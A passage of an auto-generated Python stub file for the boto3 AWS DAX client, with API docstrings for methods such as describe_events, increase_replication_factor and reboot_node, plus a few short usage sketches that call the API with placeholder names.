Value (string) --
The parameter value for this node type.
Description (string) --
A description of the parameter.
Source (string) --
How the parameter is defined. For example, system denotes a system-defined parameter.
DataType (string) --
The data type of the parameter. For example, integer .
AllowedValues (string) --
A range of values within which the parameter can be set.
IsModifiable (string) --
Whether the customer is allowed to modify the parameter.
ChangeType (string) --
The conditions under which changes to this parameter can be applied. For example, requires-reboot indicates that a new value for this parameter will only take effect if a node is rebooted.
Exceptions
DAX.Client.exceptions.ServiceLinkedRoleNotFoundFault
DAX.Client.exceptions.InvalidParameterValueException
DAX.Client.exceptions.InvalidParameterCombinationException
:return: {
'NextToken': 'string',
'Parameters': [
{
'ParameterName': 'string',
'ParameterType': 'DEFAULT'|'NODE_TYPE_SPECIFIC',
'ParameterValue': 'string',
'NodeTypeSpecificValues': [
{
'NodeType': 'string',
'Value': 'string'
},
],
'Description': 'string',
'Source': 'string',
'DataType': 'string',
'AllowedValues': 'string',
'IsModifiable': 'TRUE'|'FALSE'|'CONDITIONAL',
'ChangeType': 'IMMEDIATE'|'REQUIRES_REBOOT'
},
]
}
:returns:
DAX.Client.exceptions.ServiceLinkedRoleNotFoundFault
DAX.Client.exceptions.InvalidParameterValueException
DAX.Client.exceptions.InvalidParameterCombinationException
"""
pass
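# Usage sketch (illustrative): dumping the DAX defaults, including the
# per-node-type values that NODE_TYPE_SPECIFIC parameters carry instead of a
# single ParameterValue.
def _example_dump_default_parameters():
    import boto3
    dax = boto3.client('dax')
    response = dax.describe_default_parameters()
    for param in response['Parameters']:
        if param['ParameterType'] == 'NODE_TYPE_SPECIFIC':
            for nts in param['NodeTypeSpecificValues']:
                print(param['ParameterName'], nts['NodeType'], nts['Value'])
        else:
            print(param['ParameterName'], param.get('ParameterValue'))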
def describe_events(SourceName=None, SourceType=None, StartTime=None, EndTime=None, Duration=None, MaxResults=None, NextToken=None):
"""
Returns events related to DAX clusters and parameter groups. You can obtain events specific to a particular DAX cluster or parameter group by providing the name as a parameter.
By default, only the events occurring within the last 24 hours are returned; however, you can retrieve up to 14 days\' worth of events if necessary.
See also: AWS API Documentation
Exceptions
:example: response = client.describe_events(
SourceName='string',
SourceType='CLUSTER'|'PARAMETER_GROUP'|'SUBNET_GROUP',
StartTime=datetime(2015, 1, 1),
EndTime=datetime(2015, 1, 1),
Duration=123,
MaxResults=123,
NextToken='string'
)
:type SourceName: string
:param SourceName: The identifier of the event source for which events will be returned. If not specified, then all sources are included in the response.
:type SourceType: string
:param SourceType: The event source to retrieve events for. If no value is specified, all events are returned.
:type StartTime: datetime
:param StartTime: The beginning of the time interval to retrieve events for, specified in ISO 8601 format.
:type EndTime: datetime
:param EndTime: The end of the time interval for which to retrieve events, specified in ISO 8601 format.
:type Duration: integer
:param Duration: The number of minutes\' worth of events to retrieve.
:type MaxResults: integer
:param MaxResults: The maximum number of results to include in the response. If more results exist than the specified MaxResults value, a token is included in the response so that the remaining results can be retrieved.\nThe value for MaxResults must be between 20 and 100.\n
:type NextToken: string
:param NextToken: An optional token returned from a prior request. Use this token for pagination of results from this action. If this parameter is specified, the response includes only results beyond the token, up to the value specified by MaxResults .
:rtype: dict
ReturnsResponse Syntax
{
'NextToken': 'string',
'Events': [
{
'SourceName': 'string',
'SourceType': 'CLUSTER'|'PARAMETER_GROUP'|'SUBNET_GROUP',
'Message': 'string',
'Date': datetime(2015, 1, 1)
},
]
}
Response Structure
(dict) --
NextToken (string) --
Provides an identifier to allow retrieval of paginated results.
Events (list) --
An array of events. Each element in the array represents one event.
(dict) --
Represents a single occurrence of something interesting within the system. Some examples of events are creating a DAX cluster, adding or removing a node, or rebooting a node.
SourceName (string) --
The source of the event. For example, if the event occurred at the node level, the source would be the node ID.
SourceType (string) --
Specifies the origin of this event - a cluster, a parameter group, a node ID, etc.
Message (string) --
A user-defined message associated with the event.
Date (datetime) --
The date and time when the event occurred.
Exceptions
DAX.Client.exceptions.ServiceLinkedRoleNotFoundFault
DAX.Client.exceptions.InvalidParameterValueException
DAX.Client.exceptions.InvalidParameterCombinationException
:return: {
'NextToken': 'string',
'Events': [
{
'SourceName': 'string',
'SourceType': 'CLUSTER'|'PARAMETER_GROUP'|'SUBNET_GROUP',
'Message': 'string',
'Date': datetime(2015, 1, 1)
},
]
}
:returns:
DAX.Client.exceptions.ServiceLinkedRoleNotFoundFault
DAX.Client.exceptions.InvalidParameterValueException
DAX.Client.exceptions.InvalidParameterCombinationException
"""
pass
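# Usage sketch (illustrative): fetching the last hour of events for one
# cluster by using Duration (in minutes) instead of a StartTime/EndTime
# window. The source name is a placeholder.
def _example_recent_cluster_events():
    import boto3
    dax = boto3.client('dax')
    response = dax.describe_events(
        SourceName='my-dax-cluster',
        SourceType='CLUSTER',
        Duration=60  # minutes of event history to return
    )
    for event in response['Events']:
        print(event['Date'], event['Message'])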
def describe_parameter_groups(ParameterGroupNames=None, MaxResults=None, NextToken=None):
"""
Returns a list of parameter group descriptions. If a parameter group name is specified, the list will contain only the descriptions for that group.
See also: AWS API Documentation
Exceptions
:example: response = client.describe_parameter_groups(
ParameterGroupNames=[
'string',
],
MaxResults=123,
NextToken='string'
)
:type ParameterGroupNames: list
:param ParameterGroupNames: The names of the parameter groups.\n\n(string) --\n\n
:type MaxResults: integer
:param MaxResults: The maximum number of results to include in the response. If more results exist than the specified MaxResults value, a token is included in the response so that the remaining results can be retrieved.\nThe value for MaxResults must be between 20 and 100.\n
:type NextToken: string
:param NextToken: An optional token returned from a prior request. Use this token for pagination of results from this action. If this parameter is specified, the response includes only results beyond the token, up to the value specified by MaxResults .
:rtype: dict
ReturnsResponse Syntax
{
'NextToken': 'string',
'ParameterGroups': [
{
'ParameterGroupName': 'string',
'Description': 'string'
},
]
}
Response Structure
(dict) --
NextToken (string) --
Provides an identifier to allow retrieval of paginated results.
ParameterGroups (list) --
An array of parameter groups. Each element in the array represents one parameter group.
(dict) --
A named set of parameters that are applied to all of the nodes in a DAX cluster.
ParameterGroupName (string) --
The name of the parameter group.
Description (string) --
A description of the parameter group.
Exceptions
DAX.Client.exceptions.ParameterGroupNotFoundFault
DAX.Client.exceptions.ServiceLinkedRoleNotFoundFault
DAX.Client.exceptions.InvalidParameterValueException
DAX.Client.exceptions.InvalidParameterCombinationException
:return: {
'NextToken': 'string',
'ParameterGroups': [
{
'ParameterGroupName': 'string',
'Description': 'string'
},
]
}
:returns:
DAX.Client.exceptions.ParameterGroupNotFoundFault
DAX.Client.exceptions.ServiceLinkedRoleNotFoundFault
DAX.Client.exceptions.InvalidParameterValueException
DAX.Client.exceptions.InvalidParameterCombinationException
"""
pass
def describe_parameters(ParameterGroupName=None, Source=None, MaxResults=None, NextToken=None):
"""
Returns the detailed parameter list for a particular parameter group.
See also: AWS API Documentation
Exceptions
:example: response = client.describe_parameters(
ParameterGroupName='string',
Source='string',
MaxResults=123,
NextToken='string'
)
:type ParameterGroupName: string
:param ParameterGroupName: [REQUIRED]\nThe name of the parameter group.\n
:type Source: string
:param Source: How the parameter is defined. For example, system denotes a system-defined parameter.
:type MaxResults: integer
:param MaxResults: The maximum number of results to include in the response. If more results exist than the specified MaxResults value, a token is included in the response so that the remaining results can be retrieved.\nThe value for MaxResults must be between 20 and 100.\n
:type NextToken: string
:param NextToken: An optional token returned from a prior request. Use this token for pagination of results from this action. If this parameter is specified, the response includes only results beyond the token, up to the value specified by MaxResults .
:rtype: dict
ReturnsResponse Syntax
{
'NextToken': 'string',
'Parameters': [
{
'ParameterName': 'string',
'ParameterType': 'DEFAULT'|'NODE_TYPE_SPECIFIC',
'ParameterValue': 'string',
'NodeTypeSpecificValues': [
{
'NodeType': 'string',
'Value': 'string'
},
],
'Description': 'string',
'Source': 'string',
'DataType': 'string',
'AllowedValues': 'string',
'IsModifiable': 'TRUE'|'FALSE'|'CONDITIONAL',
'ChangeType': 'IMMEDIATE'|'REQUIRES_REBOOT'
},
]
}
Response Structure
(dict) --
NextToken (string) --
Provides an identifier to allow retrieval of paginated results.
Parameters (list) --
A list of parameters within a parameter group. Each element in the list represents one parameter.
(dict) --
Describes an individual setting that controls some aspect of DAX behavior.
ParameterName (string) --
The name of the parameter.
ParameterType (string) --
Determines whether the parameter can be applied to any nodes, or only nodes of a particular type.
ParameterValue (string) --
The value for the parameter.
NodeTypeSpecificValues (list) --
A list of node types, and specific parameter values for each node.
(dict) --
Represents a parameter value that is applicable to a particular node type.
NodeType (string) --
A node type to which the parameter value applies.
Value (string) --
The parameter value for this node type.
Description (string) --
A description of the parameter.
Source (string) --
How the parameter is defined. For example, system denotes a system-defined parameter.
DataType (string) --
The data type of the parameter. For example, integer .
AllowedValues (string) --
A range of values within which the parameter can be set.
IsModifiable (string) --
Whether the customer is allowed to modify the parameter.
ChangeType (string) --
The conditions under which changes to this parameter can be applied. For example, requires-reboot indicates that a new value for this parameter will only take effect if a node is rebooted.
Exceptions
DAX.Client.exceptions.ParameterGroupNotFoundFault
DAX.Client.exceptions.ServiceLinkedRoleNotFoundFault
DAX.Client.exceptions.InvalidParameterValueException
DAX.Client.exceptions.InvalidParameterCombinationException
:return: {
'NextToken': 'string',
'Parameters': [
{
'ParameterName': 'string',
'ParameterType': 'DEFAULT'|'NODE_TYPE_SPECIFIC',
'ParameterValue': 'string',
'NodeTypeSpecificValues': [
{
'NodeType': 'string',
'Value': 'string'
},
],
'Description': 'string',
'Source': 'string',
'DataType': 'string',
'AllowedValues': 'string',
'IsModifiable': 'TRUE'|'FALSE'|'CONDITIONAL',
'ChangeType': 'IMMEDIATE'|'REQUIRES_REBOOT'
},
]
}
:returns:
DAX.Client.exceptions.ParameterGroupNotFoundFault
DAX.Client.exceptions.ServiceLinkedRoleNotFoundFault
DAX.Client.exceptions.InvalidParameterValueException
DAX.Client.exceptions.InvalidParameterCombinationException
"""
pass
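# Usage sketch (illustrative): listing the modifiable parameters of a group
# and their current values, using only fields shown in the response
# structure above. The group name is a placeholder.
def _example_list_modifiable_parameters():
    import boto3
    dax = boto3.client('dax')
    response = dax.describe_parameters(ParameterGroupName='my-dax-params')
    for param in response['Parameters']:
        if param['IsModifiable'] == 'TRUE':
            print(param['ParameterName'], '=', param.get('ParameterValue'))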
def describe_subnet_groups(SubnetGroupNames=None, MaxResults=None, NextToken=None):
"""
Returns a list of subnet group descriptions. If a subnet group name is specified, the list will contain only the description of that group.
See also: AWS API Documentation
Exceptions
:example: response = client.describe_subnet_groups(
SubnetGroupNames=[
'string',
],
MaxResults=123,
NextToken='string'
)
:type SubnetGroupNames: list
:param SubnetGroupNames: The names of the subnet groups to describe.\n\n(string) --\n\n
:type MaxResults: integer
:param MaxResults: The maximum number of results to include in the response. If more results exist than the specified MaxResults value, a token is included in the response so that the remaining results can be retrieved.\nThe value for MaxResults must be between 20 and 100.\n
:type NextToken: string
:param NextToken: An optional token returned from a prior request. Use this token for pagination of results from this action. If this parameter is specified, the response includes only results beyond the token, up to the value specified by MaxResults .
:rtype: dict
ReturnsResponse Syntax
{
'NextToken': 'string',
'SubnetGroups': [
{
'SubnetGroupName': 'string',
'Description': 'string',
'VpcId': 'string',
'Subnets': [
{
'SubnetIdentifier': 'string',
'SubnetAvailabilityZone': 'string'
},
]
},
]
}
Response Structure
(dict) --
NextToken (string) --
Provides an identifier to allow retrieval of paginated results.
SubnetGroups (list) --
An array of subnet groups. Each element in the array represents a single subnet group.
(dict) --
Represents the output of one of the following actions:
CreateSubnetGroup
ModifySubnetGroup
SubnetGroupName (string) --
The name of the subnet group.
Description (string) --
The description of the subnet group.
VpcId (string) --
The Amazon Virtual Private Cloud identifier (VPC ID) of the subnet group.
Subnets (list) --
A list of subnets associated with the subnet group.
(dict) --
Represents the subnet associated with a DAX cluster. This parameter refers to subnets defined in Amazon Virtual Private Cloud (Amazon VPC) and used with DAX.
SubnetIdentifier (string) --
The system-assigned identifier for the subnet.
SubnetAvailabilityZone (string) --
The Availability Zone (AZ) for the subnet.
Exceptions
DAX.Client.exceptions.SubnetGroupNotFoundFault
DAX.Client.exceptions.ServiceLinkedRoleNotFoundFault
:return: {
'NextToken': 'string',
'SubnetGroups': [
{
'SubnetGroupName': 'string',
'Description': 'string',
'VpcId': 'string',
'Subnets': [
{
'SubnetIdentifier': 'string',
'SubnetAvailabilityZone': 'string'
},
]
},
]
}
:returns:
CreateSubnetGroup
ModifySubnetGroup
"""
pass
def generate_presigned_url(ClientMethod=None, Params=None, ExpiresIn=None, HttpMethod=None):
"""
Generate a presigned url given a client, its method, and arguments
:type ClientMethod: string
:param ClientMethod: The client method to presign for
:type Params: dict
:param Params: The parameters normally passed to\nClientMethod.
:type ExpiresIn: int
:param ExpiresIn: The number of seconds the presigned url is valid\nfor. By default it expires in an hour (3600 seconds)
:type HttpMethod: string
:param HttpMethod: The http method to use on the generated url. By\ndefault, the http method is whatever is used in the method\'s model.
"""
pass
def get_paginator(operation_name=None):
"""
Create a paginator for an operation.
:type operation_name: string
:param operation_name: The operation name. This is the same name\nas the method name on the client. For example, if the\nmethod name is create_foo, and you\'d normally invoke the\noperation as client.create_foo(**kwargs), if the\ncreate_foo operation can be paginated, you can use the\ncall client.get_paginator('create_foo').
:rtype: L{botocore.paginate.Paginator}
ReturnsA paginator object.
"""
pass
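# Usage sketch (illustrative): iterating every cluster in the account via a
# paginator, which follows NextToken internally. This assumes botocore
# registers paginators for this client's Describe*/ListTags operations.
def _example_paginate_clusters():
    import boto3
    dax = boto3.client('dax')
    paginator = dax.get_paginator('describe_clusters')
    for page in paginator.paginate():
        for cluster in page['Clusters']:
            print(cluster['ClusterName'], cluster['Status'])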
def get_waiter(waiter_name=None):
"""
Returns an object that can wait for some condition.
:type waiter_name: str
:param waiter_name: The name of the waiter to get. See the waiters\nsection of the service docs for a list of available waiters.
:rtype: botocore.waiter.Waiter
"""
pass
def increase_replication_factor(ClusterName=None, NewReplicationFactor=None, AvailabilityZones=None):
"""
Adds one or more nodes to a DAX cluster.
See also: AWS API Documentation
Exceptions
:example: response = client.increase_replication_factor(
ClusterName='string',
NewReplicationFactor=123,
AvailabilityZones=[
'string',
]
)
:type ClusterName: string
:param ClusterName: [REQUIRED]\nThe name of the DAX cluster that will receive additional nodes.\n
:type NewReplicationFactor: integer
:param NewReplicationFactor: [REQUIRED]\nThe new number of nodes for the DAX cluster.\n
:type AvailabilityZones: list
:param AvailabilityZones: The Availability Zones (AZs) in which the cluster nodes will be created. All nodes belonging to the cluster are placed in these Availability Zones. Use this parameter if you want to distribute the nodes across multiple AZs.\n\n(string) --\n\n
:rtype: dict
ReturnsResponse Syntax
{
'Cluster': {
'ClusterName': 'string',
'Description': 'string',
'ClusterArn': 'string',
'TotalNodes': 123,
'ActiveNodes': 123,
'NodeType': 'string',
'Status': 'string',
'ClusterDiscoveryEndpoint': {
'Address': 'string',
'Port': 123
},
'NodeIdsToRemove': [
'string',
],
'Nodes': [
{
'NodeId': 'string',
'Endpoint': {
'Address': 'string',
'Port': 123
},
'NodeCreateTime': datetime(2015, 1, 1),
'AvailabilityZone': 'string',
'NodeStatus': 'string',
'ParameterGroupStatus': 'string'
},
],
'PreferredMaintenanceWindow': 'string',
'NotificationConfiguration': {
'TopicArn': 'string',
'TopicStatus': 'string'
},
'SubnetGroup': 'string',
'SecurityGroups': [
{
'SecurityGroupIdentifier': 'string',
'Status': 'string'
},
],
'IamRoleArn': 'string',
'ParameterGroup': {
'ParameterGroupName': 'string',
'ParameterApplyStatus': 'string',
'NodeIdsToReboot': [
'string',
]
},
'SSEDescription': {
'Status': 'ENABLING'|'ENABLED'|'DISABLING'|'DISABLED'
}
}
}
Response Structure
(dict) --
Cluster (dict) --
A description of the DAX cluster, with its new replication factor.
ClusterName (string) --
The name of the DAX cluster.
Description (string) --
The description of the cluster.
ClusterArn (string) --
The Amazon Resource Name (ARN) that uniquely identifies the cluster.
TotalNodes (integer) --
The total number of nodes in the cluster.
ActiveNodes (integer) --
The number of nodes in the cluster that are active (i.e., capable of serving requests).
NodeType (string) --
The node type for the nodes in the cluster. (All nodes in a DAX cluster are of the same type.)
Status (string) --
The current status of the cluster.
ClusterDiscoveryEndpoint (dict) --
The configuration endpoint for this DAX cluster, consisting of a DNS name and a port number. Client applications can specify this endpoint, rather than an individual node endpoint, and allow the DAX client software to intelligently route requests and responses to nodes in the DAX cluster.
Address (string) --
The DNS hostname of the endpoint.
Port (integer) --
The port number that applications should use to connect to the endpoint.
NodeIdsToRemove (list) --
A list of nodes to be removed from the cluster.
(string) --
Nodes (list) --
A list of nodes that are currently in the cluster.
(dict) --
Represents an individual node within a DAX cluster.
NodeId (string) --
A system-generated identifier for the node.
Endpoint (dict) --
The endpoint for the node, consisting of a DNS name and a port number. Client applications can connect directly to a node endpoint, if desired (as an alternative to allowing the DAX client software to intelligently route requests and responses to nodes in the DAX cluster).
Address (string) --
The DNS hostname of the endpoint.
Port (integer) --
The port number that applications should use to connect to the endpoint.
NodeCreateTime (datetime) --
The date and time (in UNIX epoch format) when the node was launched.
AvailabilityZone (string) --
The Availability Zone (AZ) in which the node has been deployed.
NodeStatus (string) --
The current status of the node. For example: available .
ParameterGroupStatus (string) --
The status of the parameter group associated with this node. For example, in-sync .
PreferredMaintenanceWindow (string) --
A range of time when maintenance of DAX cluster software will be performed. For example: sun:01:00-sun:09:00 . Cluster maintenance normally takes less than 30 minutes, and is performed automatically within the maintenance window.
NotificationConfiguration (dict) --
Describes a notification topic and its status. Notification topics are used for publishing DAX events to subscribers using Amazon Simple Notification Service (SNS).
TopicArn (string) --
The Amazon Resource Name (ARN) that identifies the topic.
TopicStatus (string) --
The current state of the topic.
SubnetGroup (string) --
The subnet group where the DAX cluster is running.
SecurityGroups (list) --
A list of security groups, and the status of each, for the nodes in the cluster.
(dict) --
An individual VPC security group and its status.
SecurityGroupIdentifier (string) --
The unique ID for this security group.
Status (string) --
The status of this security group.
IamRoleArn (string) --
A valid Amazon Resource Name (ARN) that identifies an IAM role. At runtime, DAX will assume this role and use the role\'s permissions to access DynamoDB on your behalf.
ParameterGroup (dict) --
The parameter group being used by nodes in the cluster.
ParameterGroupName (string) --
The name of the parameter group.
ParameterApplyStatus (string) --
The status of parameter updates.
NodeIdsToReboot (list) --
The node IDs of one or more nodes to be rebooted.
(string) --
SSEDescription (dict) --
The description of the server-side encryption status on the specified DAX cluster.
Status (string) --
The current state of server-side encryption:
ENABLING - Server-side encryption is being enabled.
ENABLED - Server-side encryption is enabled.
DISABLING - Server-side encryption is being disabled.
DISABLED - Server-side encryption is disabled.
Exceptions
DAX.Client.exceptions.ClusterNotFoundFault
DAX.Client.exceptions.InvalidClusterStateFault
DAX.Client.exceptions.InsufficientClusterCapacityFault
DAX.Client.exceptions.InvalidVPCNetworkStateFault
DAX.Client.exceptions.NodeQuotaForClusterExceededFault
DAX.Client.exceptions.NodeQuotaForCustomerExceededFault
DAX.Client.exceptions.ServiceLinkedRoleNotFoundFault
DAX.Client.exceptions.InvalidParameterValueException
DAX.Client.exceptions.InvalidParameterCombinationException
:return: {
'Cluster': {
'ClusterName': 'string',
'Description': 'string',
'ClusterArn': 'string',
'TotalNodes': 123,
'ActiveNodes': 123,
'NodeType': 'string',
'Status': 'string',
'ClusterDiscoveryEndpoint': {
'Address': 'string',
'Port': 123
},
'NodeIdsToRemove': [
'string',
],
'Nodes': [
{
'NodeId': 'string',
'Endpoint': {
'Address': 'string',
'Port': 123
},
'NodeCreateTime': datetime(2015, 1, 1),
'AvailabilityZone': 'string',
'NodeStatus': 'string',
'ParameterGroupStatus': 'string'
},
],
'PreferredMaintenanceWindow': 'string',
'NotificationConfiguration': {
'TopicArn': 'string',
'TopicStatus': 'string'
},
'SubnetGroup': 'string',
'SecurityGroups': [
{
'SecurityGroupIdentifier': 'string',
'Status': 'string'
},
],
'IamRoleArn': 'string',
'ParameterGroup': {
'ParameterGroupName': 'string',
'ParameterApplyStatus': 'string',
'NodeIdsToReboot': [
'string',
]
},
'SSEDescription': {
'Status': 'ENABLING'|'ENABLED'|'DISABLING'|'DISABLED'
}
}
}
:returns:
(string) --
"""
pass
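# Usage sketch (illustrative): growing a cluster to three nodes spread
# across two Availability Zones. The cluster name and AZ names are
# placeholders; the call raises NodeQuotaForClusterExceededFault if the
# target exceeds the per-cluster node quota.
def _example_increase_replication_factor():
    import boto3
    dax = boto3.client('dax')
    response = dax.increase_replication_factor(
        ClusterName='my-dax-cluster',
        NewReplicationFactor=3,
        AvailabilityZones=['us-east-1a', 'us-east-1b']
    )
    return response['Cluster']['TotalNodes']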
def list_tags(ResourceName=None, NextToken=None):
"""
List all of the tags for a DAX cluster. You can call ListTags up to 10 times per second, per account.
See also: AWS API Documentation
Exceptions
:example: response = client.list_tags(
ResourceName='string',
NextToken='string'
)
:type ResourceName: string
:param ResourceName: [REQUIRED]\nThe name of the DAX resource to which the tags belong.\n
:type NextToken: string
:param NextToken: An optional token returned from a prior request. Use this token for pagination of results from this action. If this parameter is specified, the response includes only results beyond the token.
:rtype: dict
ReturnsResponse Syntax
{
'Tags': [
{
'Key': 'string',
'Value': 'string'
},
],
'NextToken': 'string'
}
Response Structure
(dict) --
Tags (list) --
A list of tags currently associated with the DAX cluster.
(dict) --
A description of a tag. Every tag is a key-value pair. You can add up to 50 tags to a single DAX cluster.
AWS-assigned tag names and values are automatically assigned the aws: prefix, which cannot be assigned by the user. AWS-assigned tag names do not count towards the tag limit of 50. User-assigned tag names have the prefix user: .
You cannot backdate the application of a tag.
Key (string) --
The key for the tag. Tag keys are case sensitive. A DAX cluster can have only one tag with a given key. If you try to add an existing tag (same key), the existing tag value will be updated to the new value.
Value (string) --
The value of the tag. Tag values are case-sensitive and can be null.
NextToken (string) --
If this value is present, there are additional results to be displayed. To retrieve them, call ListTags again, with NextToken set to this value.
Exceptions
DAX.Client.exceptions.ClusterNotFoundFault
DAX.Client.exceptions.InvalidARNFault
DAX.Client.exceptions.InvalidClusterStateFault
DAX.Client.exceptions.ServiceLinkedRoleNotFoundFault
DAX.Client.exceptions.InvalidParameterValueException
DAX.Client.exceptions.InvalidParameterCombinationException
:return: {
'Tags': [
{
'Key': 'string',
'Value': 'string'
},
],
'NextToken': 'string'
}
:returns:
DAX.Client.exceptions.ClusterNotFoundFault
DAX.Client.exceptions.InvalidARNFault
DAX.Client.exceptions.InvalidClusterStateFault
DAX.Client.exceptions.ServiceLinkedRoleNotFoundFault
DAX.Client.exceptions.InvalidParameterValueException
DAX.Client.exceptions.InvalidParameterCombinationException
"""
pass
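# Usage sketch (illustrative): collecting all tags on a cluster by following
# NextToken manually. The ARN is a placeholder; list_tags expects the
# resource identifier shown in the cluster's ClusterArn field.
def _example_list_all_tags():
    import boto3
    dax = boto3.client('dax')
    arn = 'arn:aws:dax:us-east-1:123456789012:cache/my-dax-cluster'
    tags = []
    token = None
    while True:
        kwargs = {'ResourceName': arn}
        if token:
            kwargs['NextToken'] = token
        response = dax.list_tags(**kwargs)
        tags.extend(response['Tags'])
        token = response.get('NextToken')
        if token is None:
            return tags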
def reboot_node(ClusterName=None, NodeId=None):
"""
Reboots a single node of a DAX cluster. The reboot action takes place as soon as possible. During the reboot, the node status is set to REBOOTING.
See also: AWS API Documentation
Exceptions
:example: response = client.reboot_node(
ClusterName='string',
NodeId='string'
)
:type ClusterName: string
:param ClusterName: [REQUIRED]\nThe name of the DAX cluster containing the node to be rebooted.\n
:type NodeId: string
:param NodeId: [REQUIRED]\nThe system-assigned ID of the node to be rebooted.\n
:rtype: dict
ReturnsResponse Syntax
{
'Cluster': {
'ClusterName': 'string',
'Description': 'string',
'ClusterArn': 'string',
'TotalNodes': 123,
'ActiveNodes': 123,
'NodeType': 'string',
'Status': 'string',
'ClusterDiscoveryEndpoint': {
'Address': 'string',
'Port': 123
},
'NodeIdsToRemove': [
'string',
],
'Nodes': [
{
'NodeId': 'string',
'Endpoint': {
'Address': 'string',
'Port': 123
},
'NodeCreateTime': datetime(2015, 1, 1),
'AvailabilityZone': 'string',
'NodeStatus': 'string',
'ParameterGroupStatus': 'string'
},
],
'PreferredMaintenanceWindow': 'string',
'NotificationConfiguration': {
'TopicArn': 'string',
'TopicStatus': 'string'
},
'SubnetGroup': 'string',
'SecurityGroups': [
{
'SecurityGroupIdentifier': 'string',
'Status': 'string'
},
],
'IamRoleArn': 'string',
'ParameterGroup': {
'ParameterGroupName': 'string',
'ParameterApplyStatus': 'string',
'NodeIdsToReboot': [
'string',
]
},
'SSEDescription': {
'Status': 'ENABLING'|'ENABLED'|'DISABLING'|'DISABLED'
}
}
}
Response Structure
(dict) --
Cluster (dict) --
A description of the DAX cluster after a node has been rebooted.
ClusterName (string) --
The name of the DAX cluster.
Description (string) --
The description of the cluster.
ClusterArn (string) --
The Amazon Resource Name (ARN) that uniquely identifies the cluster.
TotalNodes (integer) --
The total number of nodes in the cluster.
ActiveNodes (integer) --
The number of nodes in the cluster that are active (i.e., capable of serving requests).
NodeType (string) --
The node type for the nodes in the cluster. (All nodes in a DAX cluster are of the same type.)
Status (string) --
The current status of the cluster.
ClusterDiscoveryEndpoint (dict) --
The configuration endpoint for this DAX cluster, consisting of a DNS name and a port number. Client applications can specify this endpoint, rather than an individual node endpoint, and allow the DAX client software to intelligently route requests and responses to nodes in the DAX cluster.
Address (string) --
The DNS hostname of the endpoint.
Port (integer) --
The port number that applications should use to connect to the endpoint.
NodeIdsToRemove (list) --
A list of nodes to be removed from the cluster.
(string) --
Nodes (list) --
A list of nodes that are currently in the cluster.
(dict) --
Represents an individual node within a DAX cluster.
NodeId (string) --
A system-generated identifier for the node.
Endpoint (dict) --
The endpoint for the node, consisting of a DNS name and a port number. Client applications can connect directly to a node endpoint, if desired (as an alternative to allowing DAX client software to intelligently route requests and responses to nodes in the DAX cluster).
Address (string) --
The DNS hostname of the endpoint.
Port (integer) --
The port number that applications should use to connect to the endpoint.
NodeCreateTime (datetime) --
The date and time (in UNIX epoch format) when the node was launched.
AvailabilityZone (string) --
The Availability Zone (AZ) in which the node has been deployed.
NodeStatus (string) --
The current status of the node. For example: available .
ParameterGroupStatus (string) --
The status of the parameter group associated with this node. For example, in-sync .
PreferredMaintenanceWindow (string) --
A range of time when maintenance of DAX cluster software will be performed. For example: sun:01:00-sun:09:00 . Cluster maintenance normally takes less than 30 minutes, and is performed automatically within the maintenance window.
NotificationConfiguration (dict) --
Describes a notification topic and its status. Notification topics are used for publishing DAX events to subscribers using Amazon Simple Notification Service (SNS).
TopicArn (string) --
The Amazon Resource Name (ARN) that identifies the topic.
TopicStatus (string) --
The current state of the topic.
SubnetGroup (string) --
The subnet group where the DAX cluster is running.
SecurityGroups (list) --
A list of security groups, and the status of each, for the nodes in the cluster.
(dict) --
An individual VPC security group and its status.
SecurityGroupIdentifier (string) --
The unique ID for this security group.
Status (string) --
The status of this security group.
IamRoleArn (string) --
A valid Amazon Resource Name (ARN) that identifies an IAM role. At runtime, DAX will assume this role and use the role\'s permissions to access DynamoDB on your behalf.
ParameterGroup (dict) --
The parameter group being used by nodes in the cluster.
ParameterGroupName (string) --
The name of the parameter group.
ParameterApplyStatus (string) --
The status of parameter updates.
NodeIdsToReboot (list) --
The node IDs of one or more nodes to be rebooted.
(string) --
SSEDescription (dict) --
The description of the server-side encryption status on the specified DAX cluster.
Status (string) --
The current state of server-side encryption:
ENABLING - Server-side encryption is being enabled.
ENABLED - Server-side encryption is enabled.
DISABLING - Server-side encryption is being disabled.
DISABLED - Server-side encryption is disabled.
Exceptions
DAX.Client.exceptions.ClusterNotFoundFault
DAX.Client.exceptions.NodeNotFoundFault
DAX.Client.exceptions.InvalidClusterStateFault
DAX.Client.exceptions.ServiceLinkedRoleNotFoundFault
DAX.Client.exceptions.InvalidParameterValueException
DAX.Client.exceptions.InvalidParameterCombinationException
:return: {
'Cluster': {
'ClusterName': 'string',
'Description': 'string',
'ClusterArn': 'string',
'TotalNodes': 123,
'ActiveNodes': 123,
'NodeType': 'string',
'Status': 'string',
'ClusterDiscoveryEndpoint': {
'Address': 'string',
'Port': 123
},
'NodeIdsToRemove': [
'string',
],
'Nodes': [
{
'NodeId': 'string',
'Endpoint': {
'Address': 'string',
'Port': 123
},
'NodeCreateTime': datetime(2015, 1, 1),
'AvailabilityZone': 'string',
'NodeStatus': 'string',
'ParameterGroupStatus': 'string'
},
],
'PreferredMaintenanceWindow': 'string',
'NotificationConfiguration': {
'TopicArn': 'string',
'TopicStatus': 'string'
},
'SubnetGroup': 'string',
'SecurityGroups': [
{
'SecurityGroupIdentifier': 'string',
'Status': 'string'
},
],
'IamRoleArn': 'string',
'ParameterGroup': {
'ParameterGroupName': 'string',
'ParameterApplyStatus': 'string',
'NodeIdsToReboot': [
'string',
]
},
'SSEDescription': {
'Status': 'ENABLING'|'ENABLED'|'DISABLING'|'DISABLED'
}
}
}
:returns:
(string) --
"""
pass
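# Hedged usage sketch (illustrative names): reboot one node, then poll
# describe_clusters until every node reports 'available' again. The 15-second
# interval is an arbitrary choice, not a documented recommendation.
#
#   import time
#   client.reboot_node(ClusterName='my-dax', NodeId='my-dax-a')
#   while True:
#       cluster = client.describe_clusters(ClusterNames=['my-dax'])['Clusters'][0]
#       if all(n['NodeStatus'] == 'available' for n in cluster['Nodes']):
#           break
#       time.sleep(15)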
def tag_resource(ResourceName=None, Tags=None):
"""
Associates a set of tags with a DAX resource. You can call TagResource up to 5 times per second, per account.
See also: AWS API Documentation
Exceptions
:example: response = client.tag_resource(
ResourceName='string',
Tags=[
{
'Key': 'string',
'Value': 'string'
},
]
)
:type ResourceName: string
:param ResourceName: [REQUIRED]\nThe name of the DAX resource to which tags should be added.\n
:type Tags: list
